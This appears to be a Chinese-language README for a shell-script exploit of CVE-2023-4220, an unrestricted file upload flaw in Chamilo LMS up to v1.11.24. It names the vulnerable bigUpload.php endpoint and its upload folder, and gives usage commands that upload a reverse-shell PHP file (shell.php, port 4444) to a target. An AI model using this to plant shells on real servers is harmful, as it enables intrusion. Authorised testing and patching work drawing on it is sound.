此漏洞利用程序演示了 Chamilo-LMS 中的 unrestricted 文件上传漏洞。该漏洞影响位于以下路径的大文件上传功能:
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
受影响版本:Chamilo LMS <= v1.11.24
该漏洞允许任意文件上传到:
/main/inc/lib/javascript/bigupload/files/
首先,使漏洞利用程序可执行并查看用法信息:
chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh
使用所需参数运行漏洞利用程序:
./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file
在以下位置验证已上传的文件:
http://target.test/main/inc/lib/javascript/bigupload/files/
-f:指定要上传的文件-h:目标主机 URL-p:连接的端口号./CVE-2023-4220.sh -f shell.php -h http://target.test -p 4444
该漏洞存在于 Chamilo LMS 的文件上传机制中,该机制在大文件上传功能中未能正确验证上传的文件。
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
/main/inc/lib/javascript/bigupload/files/